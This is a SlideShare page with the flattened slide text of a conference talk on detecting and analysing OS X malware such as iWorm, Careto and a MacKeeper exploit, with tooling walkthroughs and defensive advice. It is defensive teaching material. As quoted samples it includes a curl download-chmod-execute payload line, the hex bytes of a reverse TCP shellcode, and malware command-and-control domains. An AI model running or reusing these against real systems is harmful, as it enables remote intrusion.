Synack, profile picture
Uploaded bySynack
1,215 views

RSA OSX Malware

‣ This document provides an overview of OS X malware diagnosis and analysis techniques. ‣ It discusses common infection vectors for OS X malware, such as fake installers and infected torrents. ‣ A variety of analysis techniques are presented, including checking for known malware signatures, analyzing file attributes, strings, dynamic file I/O, and network activity to help determine if a binary is malicious.

Embed presentation

Downloaded 15 times
SESSION ID: Let’s Play Doctor
 Prac/cal OS X Malware Detec/on & Analysis HTA-W03F Patrick Wardle Director of Research at Synack
 @patrickwardle
WHOIS “leverages the best combina1on of humans and technology to discover security vulnerabili1es in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” @patrickwardle security for the 21st century career hobby
OUTLINE steps to a happier, healthier 2016 outbreaks diagnos:cs analysis health & happiness virology } @thomasareed @claud_xiao @osxreverser thanks & credit
PART 0X1: OUTBREAKS overview of recent OS X malware specimens
MALWARE ON OS X yes; it exists and is geSng more prevalent “It doesn’t get PC viruses. A Mac isn’t suscep1ble to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) 2014: "nearly 1000 unique aMacks on Macs; 25 major families" -kasperksy 2015: "The most prolific year in history for OS X malware...5x more OS X malware appeared in 2015 than during the previous five years combined" 
 -bit9 2015: OS X most vulnerable soEware by CVE count -cve details
OS X/IWORM ‘standard’ backdoor, providing survey, download/execute, etc. # fs_usage -w -f filesys 20:28:28.727871 open /Library/LaunchDaemons/com.JavaW.plist 20:28:28.727890 write B=0x16b launch daemon survey download execute persis:ng infected torrents launch daemon plist
OS X/CRISIS (RCSMAC) hackingteam's implant; collect all things! launch agent rootkit component persistence (leaked source code) intelligence collec:on “HackingTeam Reborn; 
 Analysis of an RCS Implant Installer"
OS X/XCODEGHOST applica/on infector $ less Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/ Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec
 ... Name = ALL_OTHER_LDFLAGS; DefaultValue = "$(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $ (OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS) 
 -force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices"; modified LD.xcspec file source compile app store infected :( infected app app installed
} OS X/GENIEO (INKEEPR) most prolific os x adware browser extension(s) fake installers bundled with apps ADs
OS X/BACKDOOR(?) bot/backdoor that exploits MacKeeper <script> window.location.href = 'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/<BASE_64_ENCODED_STUB>'; ... "[a] flaw in MacKeeper's URL handler implementa1on allows arbitrary remote code execu1on when a user visits a specially cra]ed webpage" -bae systems exploit & payload launch agent curl -A 'Safari' -o /Users/Shared/dufh http://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr; chmod 755 /Users/Shared/dufh; cd /Users/Shared; ./dufh shell download executesurvey
OS X/CARETO ('MASK') ‘cyber-espionage backdoor' launch agent [~/Library/LaunchAgents/ com.apple.launchport.plist] lea rdi, encodedServer ; "x16dn~x1AcM!"... mov rsi, decodedServer call __Dcd ... mov rdi, decodedServer mov esi, cs:_port call _sbd_connect $ lldb OSX_Careto (lldb) target create "OSX_Careto" Current executable set to 'OSX_Careto' (x86_64).'' 
 (lldb) b _Dcd Breakpoint 1: where = OSX_Careto`_Dcd,
 ... $ (lldb) x/s decodedServer 0x100102b40: "itunes212.appleupdt.com" disassembly debugging (decoding C&C) encoded strings phishing/exploits
PART 0X2: VIROLOGY study of os x malware characteris/cs & commonali/es
INFECTION VECTORS method 0x1: via user-interac/on fake codecs fake installers/updates infected torrents rogue "AV" products ??? poor naive users
INFECTION VECTORS method 0x2: exploits "interested in buying zero-day vulnerabili1es with RCE exploits for the latest versions of ...Safari? ...exploits allow to embed and remote execute custom payloads and demonstrate modern [exploita1on] techniques on OS X" 
 -V. Toropov (email to hackingteam) how the real hackers do it } ;OSX x64 reverse tcp shell (131 bytes, shell-storm.org) ;"x41xB0x02x49xC1xE0x18x49x83xC8x61x4Cx89xC0x48" + ;"x31xD2x48x89xD6x48xFFxC6x48x89xF7x48xFFxC7x0F" + ;"x05x49x89xC4x49xBDx01x01x11x5CxFFxFFxFFxFFx41" + ;"xB1xFFx4Dx29xCDx41x55x49x89xE5x49xFFxC0x4Cx89" + ;"xC0x4Cx89xE7x4Cx89xEEx48x83xC2x10x0Fx05x49x83" + ;"xE8x08x48x31xF6x4Cx89xC0x4Cx89xE7x0Fx05x48x83" + ;"xFEx02x48xFFxC6x76xEFx49x83xE8x1Fx4Cx89xC0x48" + ;"x31xD2x49xBDxFFx2Fx62x69x6Ex2Fx73x68x49xC1xED" + ;"x08x41x55x48x89xE7x48x31xF6x0Fx05"
PERSISTENCE many op/ons, few used launchdaemons&agents userloginitems browserextensions&plugins [RSA2015]
 "Malware Persistence on OS X" ~20 techniques
FEATURES dependent on the goals of the malware [ criminal ] [ espionage ] shell video audio ads clicks money keylogs surveys downloads exec's
SUMMARY the current state of OS X malware crime espionage persistence psp bypassself-defense features ‣ well known methods ‣ majority: launch items ‣ minimal obfusca:on ‣ trivial to detect/remove ‣ poorly implemented ‣ suffice for the job ‣ occasional an:-AV ‣ no psp detec:on stealth ‣ 'hide' in plain site ‣ rootkits? not common infec:on ‣ trojans/phishing ‣ some exploits
PART 0X3: DIAGNOSTICS are you possibly infected?
VISUALLY OBSERVABLE INDICATORS more ohen than not, you're not infected... unlikelymalware possiblymalware "mycomputeris soslow" "itkeepscrashing" ADs "somanyprocesses" "therearetonsofpopups" "mycomputersaysitsinfected "myhomepageandsearch engineareweird" most not trivially observable!
VISUALLY OBSERVABLE INDICATORS generic alerts may indicate the presence of malware persistence(BlockBlock) networkaccess(LittleSnitch) note:suchtoolsdonotattempttodirectlydetectmalwareper-se…
STEP 0X1: KNOWN MALWARE any known malware running on your system? TaskExplorer(+virustotalintegration) VT ratios
STEP 0X2: SUSPICIOUS PROCESSES any unrecognized binaries running on your system? unsignedtasks “globalsearch”for: 3rd-partytasks unsigned "apple" unrecognized(byVT) suspicious! + +
STEP 0X3: SUSPICIOUS PERSISTENCE any unrecognized binaries persis/ng on your system? KnockKnock;enum.persistence unsigned "apple" suspicious! asuspiciouslaunchitem unrecognized(byVT) + +
STEP 0X4: NETWORK I/O odd ports or unrecognized connec/ons? # sudo lsof -i | grep ESTABLISHED apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) com.apple 1168 user TCP 172.16.44.128:49511->bd044252.virtua.com.br:https (ESTABLISHED) JavaW 1184 root TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED) iWorm('JavaW')listeningforattackerconnection or 'established' for connected sessions iWormconnectedtoc&cserver
STEP 0X5: SUSPICIOUS KEXTS, HIJACKED DYLIBS, ETC. countless other things to look for.... uncheck ‘'Show OS Kexts' anysuspiciouskernelextensions? hijackeddylibs? [DefCon 2015] "DLL Hijacking on OS X? #@%& Yeah!"
PART 0X4: ANALYSIS determine if something is malicious....or not!?
CODE-SIGNING examine the binary’s code signature $ codesign -dvv /usr/lib/libtidy.A.dylib 
 Format=Mach-O universal (i386 x86_64)
 Authority=Software Signing Authority=Apple Code Signing Certification Authority Authority=Apple Root CA libtidy is signed by apple proper codesign -dvv OSX_Careto 
 OSX_Careto: code object is not signed at all most malware; unsigned signed by apple: not malware! libtidy dylib flagged by VT usecodesigntodisplaya binary’ssigninginfo ex:$ codesign -dvv <file>
GOOGLE THE HASH may (quickly) tell you; known good || known bad $ md5 appleUpdater MD5 (appleUpdater) = 2b30e1f13a648cc40c1abb1148cf5088 unknown hash ….might be odd ‣ 3rd-partybinaries,mayproduce zerohitsongoogle ‣ 0%detectiononvirustotaldoesn’t mean100%notmalware known hash (OSX/Careto)
STRINGS quickly triage a binary’s func/onality $ strings -a OSX_Careto
 reverse lookup of %s failed: %s bind(): %s connecting to %s (%s) [%s] on port %u executing: %s
 cM!M> `W9_c [0;32m strings;osx/careto networking& execlogic encodedstrings $ strings -a JavaW 
 $Info: This file is packed with the UPX executable packer $Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. strings; iWorm usewiththe-aflag packed(UPX) googleinterestingstrings
FILE ATTRIBUTES OS X na/vely support encrypted binaries ourhardworkbythese wordsguardedplease dontsteal(c)AppleC encrypted with Blowfish disassembling Finder.app encryp:ng the malware $ strings -a myMalware infectUser: ALOHA RSA! $ ./protect myMalware encrypted 'myMalware' $ strings -a myMalware 
 n^jd[P5{Q r_`EYFaJq07 known malware: ~50% drop VT detection
FILE ATTRIBUTES detec/ng encrypted binaries //check all load commands for(int i = 0; i<[machoHeader[LOAD_CMDS] count]; i++) { //grab load command loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i];
 //check text segment if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)) { //check if segment is protected if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1)) { //FILE IS ENCRYPTED detec:ng encryp:on TaskExplorer }unsigned encrypted +
FILE ATTRIBUTES malware is ohen packed to 'hinder' detec/on/analysis $ strings -a JavaW
 
 Info: This file is packed with the UPX executable packer http://upx.sf.net Id: UPX 3.09 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. iWorm(JavaW);packed //count all occurrences for(NSUInteger i = 0; i < length; i++) occurrences[0xFF & (int)data[i]]++; //calc entropy for(NSUInteger i = 0; 
 i < sizeof(occurrences)/sizeof(occurrences[0]); i++) { //add occurrences to entropy if(0 != occurrences[i]) { //calc ratio pX = occurrences[i]/(float)length; //cumulative entropy entropy -= pX*log2(pX); } TaskExplorer genericpackerdetectionalgorithm viewallpackedtasks/dylibs
CLASSDUMP extract class names, methods, & more... $ class-dump RCSMac.app
 
 @interface __m_MCore : NSObject { NSString *mBinaryName; NSString *mSpoofedName; } - (BOOL)getRootThroughSLI;
 - (BOOL)isCrisisHookApp:(id)arg1;
 - (BOOL)makeBackdoorResident; - (void)renameBackdoorAndRelaunch;
 @end rcsmac(osx/crisis) $ class-dump Installer.app
 
 @interface ICDownloader : 
 NSObject <NSURLConnectionDelegate> { NSURL *_URL; NSString *_destPath; long long _httpStatusCode; NSString *_suggestedName; } - (void)startDownloading; @interface NSURL (ICEncryptedFileURLProtocol) + (id)fileURLWithURL:(id)arg1; + (id)encryptedFileURLWithURL:(id)arg1; @end adwareinstaller(InstallCore) http://stevenygard.com/projects/class-dump/
DYNAMIC FILE I/O quickly determine binaries file-related ac/ons # fs_usage -w -f filesystem
 open /Users/user/Library/LaunchAgents/com.apple.updater.plist write F=2 B=0x4a 
 
 
 open F=5 /Users/Shared/dufh …
 chmod <rwxr-xr-x> /Users/Shared/dufh 
 unlink ./mackeeperExploiter filei/o(mackeeperexploiter) $ man fs_usage FS_USAGE(1) BSD General Commands Manual fs_usage -- report system calls and page faults related to filesystem activity in real-time fs_usagemanpage persistenceaslaunchagent (com.apple.updater.plist) installation(/Users/ Shared/dufh) selfdeletion,cleanup
NETWORK I/O gain insight into the binary's network communica/ons osx/caretoinwireshark note: C&C is (now) offline odddnsqueries periodicbeacons (custom)encryptedtraffic "itunes212.appleupdt.com"
VIRUSTOTAL SANDBOX file i/o + network i/o, and more! virustotalportal filei/o(iWorm) networki/o(iWorm) "VirusTotal+=MacOSXexecution"
 
 blog.virustotal.com/2015/11/ virustotal-mac-os-x-execution.html
REVERSING OBJECTIVE-C understand connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString ; "URLWithString:" lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ; objc_msgSend ... internetcheck(mackeeperexploiter) arg name (for) objc_msgSend 0 RDI class 1 RSI method name 2 RDX 1st argument 3 RCX 2nd argument 4 R8 3rd argument 5 R9 4th argument objc_msgSendfunction callingconvention(systemvamd64abi)
DECOMPILATION there’s an app for that! int connectedToInternet() { rax = [NSURL URLWithString:@"http://www.google.com"]; rdx = rax; var_38 = [NSData dataWithContentsOfURL:rdx]; if(var_38 != 0x0) { var_1 = 0x1; } else { var_1 = 0x0; } rax = var_1 & 0x1 & 0xff; return rax; } decompilation;internetcheck(mackeeperexploiter) connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString_ lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ... hopper.app
 http://www.hopperapp.com
DEBUGGING using lldb; os x’s debugger command description example r launch (run) the process b breakpoint on function b system br s -a <addr> breakpoint on a memory add br s -a 0x10001337 si/ni step into/step over po print objective-C object po $rax reg read print all registers $ lldb newMalware (lldb) target create "/Users/patrick/malware/newMalware" Current executable set to '/Users/patrick/malware/newMalware' (x86_64). beginningadebuggingsession see:"Gdb to LLDB Command Map" commonlldbcommands
DEBUGGING DETECTION os x an/-debugging techniques call _getpid mov [rbp+var_34], eax mov [rbp+var_2D0], 288h lea rdi, [rbp+var_40] lea rdx, [rbp+var_2C8] lea rcx, [rbp+var_2D0] mov esi, 4 xor r8d, r8d xor r9d, r9d call _sysctl mov eax, [rbp+var_2A8] test ah, 8 jz short notDebugged mov rdi, [rbx] call _remove //debugger flag #define P_TRACED 0x00000800 //management info base (‘mib’) mib[0] = CTL_KERN; mib[1] = KERN_PROC; mib[2] = KERN_PROC_PID; mib[3] = getpid(); //get process info sysctl(mib, sizeof(mib)/sizeof(*mib), &info, &size, NULL, 0); //check flags to determine if debugged if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)) { //process is debugged!
 //self delete remove(path2Self); } anti-debug(mackeeperexploiter) processflags(debugged) anti-debugpseudo-code “Analyzing the Anti-Analysis Logic, of an Adware Installer"
ENABLING KERNEL DEBUGGING for analyzing kernel extensions and rootkit components # nvram boot-args="debug=0x141 pmuflags=1 -v" enabledebugging disableSIP(inrecoverymode;⌘+r) installappropriate‘kerneldebugkit’ # lldb (lldb) target create /Library/Developer/KDKs/ KDK_10.11.1_15B42_.kdk/System/Library/Kernels/kernel startdebugger(lldb) (lldb) kdp-remote <VM IP addr> Version: Darwin Kernel Version 15.0.0: Wed Aug 26 16:57:32 PDT 2015; root:xnu-3247.1.106~1/ RELEASE_X86_64; 
 
 (lldb) image list [ 0] 37BC582F-8BF4-3F65-AFBB-ECF792060C68 0xffffff8007000000 /Library/Developer/KDKs/ KDK_10.11_15A284.kdk/System/Library/Kernels/kernel connectanddebug “Kernel Debugging a Virtualized 
 OS X Image"
PART 0X5: HEALTH & HAPPINESS how do i protect my personal macs?
APPLE'S OS X SECURITY MITIGATIONS? gatekeeper, xprotect, SIP, code-signing, et al... "Security & privacy are fundamental to the design of all our hardware, so]ware, and services" -:m cook ‣ "Gatekeeper Exposed"
 (Shmoocon) ‣ "OS X El Capitan-Sinking the S/hIP" ‣ "Memory Corruption is for Wussies!" (SysScan) ‣ "Writing Bad@ss OS X Malware" 
 (Blackhat) ‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)
only 4 launch items no 'java' processes fully patched OS X gatekeeper enabled DEMO(GATEKEEPER BYPASS)
OS X LOCKDOWN hardens OS X & reduces its anack surface # ./osxlockdown [PASSED] Enable Auto Update [PASSED] Disable Bluetooth [PASSED] Disable infrared receiver [PASSED] Disable AirDrop ...
 
 osxlockdown 0.9 Final Score 86%; Pass rate: 26/30
 osxlockdown
 S.Piper(@0xdabbad00) github.com/SummitRoute/osxlockdown “builttoaudit&remediate,security configurationsettingsonOSX10.11" -S.Piper
OS X SECURITY TOOL LinleSnitch Firewall “if[LittleSnitch]isfound,themalware[OSX/DevilRobber.A]willskip installationandproceedtoexecutethecleansoftware”-fSecure.com trivialtobypass securityvulnerabilities? yes, stay tuned! 'snitching
MY PERSONAL SECURITY TOOLS Objec/ve-See, because "sharing is caring" :) "No one is going to provide you a quality service for nothing. 
 If you’re not paying, you’re the product." -fSecure ...as they try to sell things! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
SECURITY TOOLS Objec/ve-See KnockKnock BlockBlock TaskExplorer Ostiarius Hijack Scanner KextViewr Lockdown specimenstoplaywith!
CONCLUSIONS wrapping this all up…
CONCLUSIONS & APPLICATION osxmalware (iWorm,Crisis,Genieo,etc.) learned about: scan & protect! littlesnitch/firewall patrick@synack.com @patrickwardle genericdetection&analysis 'focusonsession'
 today@2:10PM,westroom2016
credits - iconmonstr.com - http://wirdou.com/2012/02/04/is-that-bad-doctor/
 
 
 - thesafemac.com - "Mac OS X & iOS Internals", Jonathan Levin - http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware- and-affected-ios-apps/ - http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html - http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
 images resources

More Related Content

PDF
OS X Malware: Let's Play Doctor
bySynack
 
PDF
Black Hat '15: Writing Bad @$$ Malware for OS X
bySynack
 
PDF
Gatekeeper Exposed
bySynack
 
PDF
ZeroNights: Automating iOS blackbox security scanning
byMikhail Sosonkin
 
PDF
Synack at AppSec California with Patrick Wardle
bySynack
 
PDF
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
bySynack
 
PDF
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
bySynack
 
PDF
Virus Bulletin 2015: Exposing Gatekeeper
bySynack
 
OS X Malware: Let's Play Doctor
bySynack
 
Black Hat '15: Writing Bad @$$ Malware for OS X
bySynack
 
Gatekeeper Exposed
bySynack
 
ZeroNights: Automating iOS blackbox security scanning
byMikhail Sosonkin
 
Synack at AppSec California with Patrick Wardle
bySynack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
bySynack
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
bySynack
 
Virus Bulletin 2015: Exposing Gatekeeper
bySynack
 

What's hot

PDF
iOS Automation Primitives
bySynack
 
PDF
Synack at AppSec California 2015 - Geolocation Vulnerabilities
bySynack
 
PDF
DLL Hijacking on OS X
bySynack
 
PDF
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
bySynack
 
PDF
Synack at ShmooCon 2015
bySynack
 
PDF
DEF CON 23: Internet of Things: Hacking 14 Devices
bySynack
 
PDF
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...
byJakub "Kuba" Sendor
 
PDF
The Mouse is mightier than the sword
byPriyanka Aash
 
PDF
Threat stack aws
byJen Andre
 
PDF
Fire & Ice: Making and Breaking macOS Firewalls
byPriyanka Aash
 
PDF
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
byFelipe Prado
 
PDF
Codetainer: a Docker-based browser code 'sandbox'
byJen Andre
 
PDF
Applications secure by default
bySecuRing
 
PDF
sf bay area dfir meetup (2016-04-30) - OsxCollector
byRishi Bhargava
 
PDF
Csw2016 economou nissim-getting_physical
byCanSecWest
 
ODT
Kioptrix 2014 5
byJayesh Patel
 
PDF
Hack any website
bysunil kumar
 
PDF
BSidesSF 2016 - A year in the wild: fighting malware at the corporate level
byJakub "Kuba" Sendor
 
PDF
DEF CON 24 - Patrick Wardle - 99 problems little snitch
byFelipe Prado
 
PDF
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
byFelipe Prado
 
iOS Automation Primitives
bySynack
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
bySynack
 
DLL Hijacking on OS X
bySynack
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
bySynack
 
Synack at ShmooCon 2015
bySynack
 
DEF CON 23: Internet of Things: Hacking 14 Devices
bySynack
 
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...
byJakub "Kuba" Sendor
 
The Mouse is mightier than the sword
byPriyanka Aash
 
Threat stack aws
byJen Andre
 
Fire & Ice: Making and Breaking macOS Firewalls
byPriyanka Aash
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
byFelipe Prado
 
Codetainer: a Docker-based browser code 'sandbox'
byJen Andre
 
Applications secure by default
bySecuRing
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
byRishi Bhargava
 
Csw2016 economou nissim-getting_physical
byCanSecWest
 
Kioptrix 2014 5
byJayesh Patel
 
Hack any website
bysunil kumar
 
BSidesSF 2016 - A year in the wild: fighting malware at the corporate level
byJakub "Kuba" Sendor
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
byFelipe Prado
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
byFelipe Prado
 

Viewers also liked

PDF
Synack cirtical infrasructure webinar
bySynack
 
PDF
Zeronights 2016 - Automating iOS blackbox security scanning
bySynack
 
PDF
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
bySynack
 
DOCX
Giver (archetypes)
byXiao Yun
 
PDF
Sips structrual insulated panels
bysips-structural-insulated-panels
 
PPTX
TAPipedia User Tutorial
byTheo Kontogiannis
 
DOCX
400 blows
byXiao Yun
 
PPTX
Ad hoc on demand distance
byJimit Rupani
 
PDF
Osb eps osb structural insulated panels
bysips-structural-insulated-panels
 
PDF
Come scegliere l'album di matrimonio?
byMarco Gabriella
 
PPTX
istilah-istilah jaringan internet dalam komputer
byAbednego Ringgo
 
PPTX
me
bybarcata
 
PPT
преимущества и недостатки интернета
byAy_sel
 
PDF
Crack the Consumer Code
byPlaceable
 
TXT
Log
byRosa Martinez
 
PDF
Mgo eps mgo structural insulated panels
bysips-structural-insulated-panels
 
Synack cirtical infrasructure webinar
bySynack
 
Zeronights 2016 - Automating iOS blackbox security scanning
bySynack
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
bySynack
 
Giver (archetypes)
byXiao Yun
 
Sips structrual insulated panels
bysips-structural-insulated-panels
 
TAPipedia User Tutorial
byTheo Kontogiannis
 
400 blows
byXiao Yun
 
Ad hoc on demand distance
byJimit Rupani
 
Osb eps osb structural insulated panels
bysips-structural-insulated-panels
 
Come scegliere l'album di matrimonio?
byMarco Gabriella
 
istilah-istilah jaringan internet dalam komputer
byAbednego Ringgo
 
me
bybarcata
 
преимущества и недостатки интернета
byAy_sel
 
Crack the Consumer Code
byPlaceable
 
Log
byRosa Martinez
 
Mgo eps mgo structural insulated panels
bysips-structural-insulated-panels
 

Similar to RSA OSX Malware

PDF
Synack Shakacon OSX Malware Persistence
byIvan Einstein
 
PDF
Let's Play Doctor....by Patrick Wardle
byShakacon
 
PPTX
OSX/Pirrit: The blue balls of OS X adware
byAmit Serper
 
PDF
macOS Vulnerabilities Hiding in Plain Sight
byCsaba Fitzl
 
PDF
Attacking the macOS Kernel Graphics Driver
byPriyanka Aash
 
PPTX
Mmw mac malware-mac
byCyphort
 
PPTX
Open Source Malware Lab
byThreatConnect
 
PPTX
Detecting Bad Apples: Understanding macOS Malware TTPs by Surya Teja
byCysinfo Cyber Security Community
 
PPTX
Let's Talk Technical: Malware Evasion and Detection
byJames Haughom Jr
 
PDF
DEF CON 27 - workshop - RICHARD GOLD - mind the gap
byFelipe Prado
 
PDF
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
byOlehLevytskyi1
 
PDF
OSX Pirrit : Why you should care about malicious mac adware
byPriyanka Aash
 
PDF
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
byTzung-Bi Shih
 
PDF
Computer Security Principles and Practice 4th Edition Stallings Test Bank
bymnglyse
 
PDF
Mitigating Exploits Using Apple's Endpoint Security
byCsaba Fitzl
 
PDF
Computer Security Principles and Practice 4th Edition Stallings Test Bank
bymasnetseko
 
PPS
Viruses and Anti-Viruses
byAyman Hussein
 
PPTX
Malware and Anti-Malware Seminar by Benny Czarny
byOPSWAT
 
PDF
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
byMITRE ATT&CK
 
PDF
Kaspersky Anti-Virus for Macintosh - Technical Presentation
byquestar
 
Synack Shakacon OSX Malware Persistence
byIvan Einstein
 
Let's Play Doctor....by Patrick Wardle
byShakacon
 
OSX/Pirrit: The blue balls of OS X adware
byAmit Serper
 
macOS Vulnerabilities Hiding in Plain Sight
byCsaba Fitzl
 
Attacking the macOS Kernel Graphics Driver
byPriyanka Aash
 
Mmw mac malware-mac
byCyphort
 
Open Source Malware Lab
byThreatConnect
 
Detecting Bad Apples: Understanding macOS Malware TTPs by Surya Teja
byCysinfo Cyber Security Community
 
Let's Talk Technical: Malware Evasion and Detection
byJames Haughom Jr
 
DEF CON 27 - workshop - RICHARD GOLD - mind the gap
byFelipe Prado
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
byOlehLevytskyi1
 
OSX Pirrit : Why you should care about malicious mac adware
byPriyanka Aash
 
Feldo: Function Event Listing and Dynamic Observing for Detecting and Prevent...
byTzung-Bi Shih
 
Computer Security Principles and Practice 4th Edition Stallings Test Bank
bymnglyse
 
Mitigating Exploits Using Apple's Endpoint Security
byCsaba Fitzl
 
Computer Security Principles and Practice 4th Edition Stallings Test Bank
bymasnetseko
 
Viruses and Anti-Viruses
byAyman Hussein
 
Malware and Anti-Malware Seminar by Benny Czarny
byOPSWAT
 
Exploring the Labyrinth: Deep dive into the Lazarus Group's foray into macOS
byMITRE ATT&CK
 
Kaspersky Anti-Virus for Macintosh - Technical Presentation
byquestar
 

Recently uploaded

PPTX
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 
PPTX
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
PPTX
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
PDF
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
PDF
Real-Time Data Insight Using Microsoft Forms for Business
byElevate
 
PDF
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
PDF
The year in review - MarvelClient in 2025
bypanagenda
 
PDF
Cybersecurity: Safeguarding Digital Assets
byYasir Naveed Riaz
 
PPTX
Data Privacy and Protection: Safeguarding Information in a Connected World
byYasir Naveed Riaz
 
PDF
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Internet_of_Things_IoT_for_Next_Generation_Smart_Systems_Utilizing.pdf
byRoshanSyed12
 
PDF
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
PPTX
AI's Impact on Cybersecurity - Challenges and Opportunities
byYasir Naveed Riaz
 
PDF
DevFest El Jadida 2025 - Product Thinking
byElmehdi AMLOU
 
PPTX
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
PPTX
THIS IS CYBER SECURITY NOTES USED IN CLASS ON VARIOUS TOPICS USED IN CYBERSEC...
byMelissaGblinwon
 
PDF
Day 2 - Network Security ~ 2nd Sight Lab ~ Cloud Security Class ~ 2020
by2nd Sight Lab
 
PPTX
Cloud-and-AI-Platform-FY26-Partner-Playbook.pptx
byiuiuiuiu1
 
PPTX
wob-report.pptxwob-report.pptxwob-report.pptx
byssuser0d171c
 
PPTX
DYNAMICALLY.pptx good for the teachers or students to do seminars and for tea...
bympoorvika031
 
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
Is It Possible to Have Wi-Fi Without an Internet Provider
bySidra Jefferi
 
Real-Time Data Insight Using Microsoft Forms for Business
byElevate
 
Vibe Coding vs. Spec-Driven Development [Free Meetup]
byHaim Michael
 
The year in review - MarvelClient in 2025
bypanagenda
 
Cybersecurity: Safeguarding Digital Assets
byYasir Naveed Riaz
 
Data Privacy and Protection: Safeguarding Information in a Connected World
byYasir Naveed Riaz
 
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Internet_of_Things_IoT_for_Next_Generation_Smart_Systems_Utilizing.pdf
byRoshanSyed12
 
Usage Control for Process Discovery through a Trusted Execution Environment
byValerioGoretti
 
AI's Impact on Cybersecurity - Challenges and Opportunities
byYasir Naveed Riaz
 
DevFest El Jadida 2025 - Product Thinking
byElmehdi AMLOU
 
Cybercrime in the Digital Age: Risks, Impact & Protection
byYasir Naveed Riaz
 
THIS IS CYBER SECURITY NOTES USED IN CLASS ON VARIOUS TOPICS USED IN CYBERSEC...
byMelissaGblinwon
 
Day 2 - Network Security ~ 2nd Sight Lab ~ Cloud Security Class ~ 2020
by2nd Sight Lab
 
Cloud-and-AI-Platform-FY26-Partner-Playbook.pptx
byiuiuiuiu1
 
wob-report.pptxwob-report.pptxwob-report.pptx
byssuser0d171c
 
DYNAMICALLY.pptx good for the teachers or students to do seminars and for tea...
bympoorvika031
 

RSA OSX Malware

  • 1.
    SESSION ID: Let’s PlayDoctor
 Prac/cal OS X Malware Detec/on & Analysis HTA-W03F Patrick Wardle Director of Research at Synack
 @patrickwardle
  • 2.
    WHOIS “leverages the bestcombina1on of humans and technology to discover security vulnerabili1es in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” @patrickwardle security for the 21st century career hobby
  • 3.
    OUTLINE steps to ahappier, healthier 2016 outbreaks diagnos:cs analysis health & happiness virology } @thomasareed @claud_xiao @osxreverser thanks & credit
  • 4.
    PART 0X1: OUTBREAKS overviewof recent OS X malware specimens
  • 5.
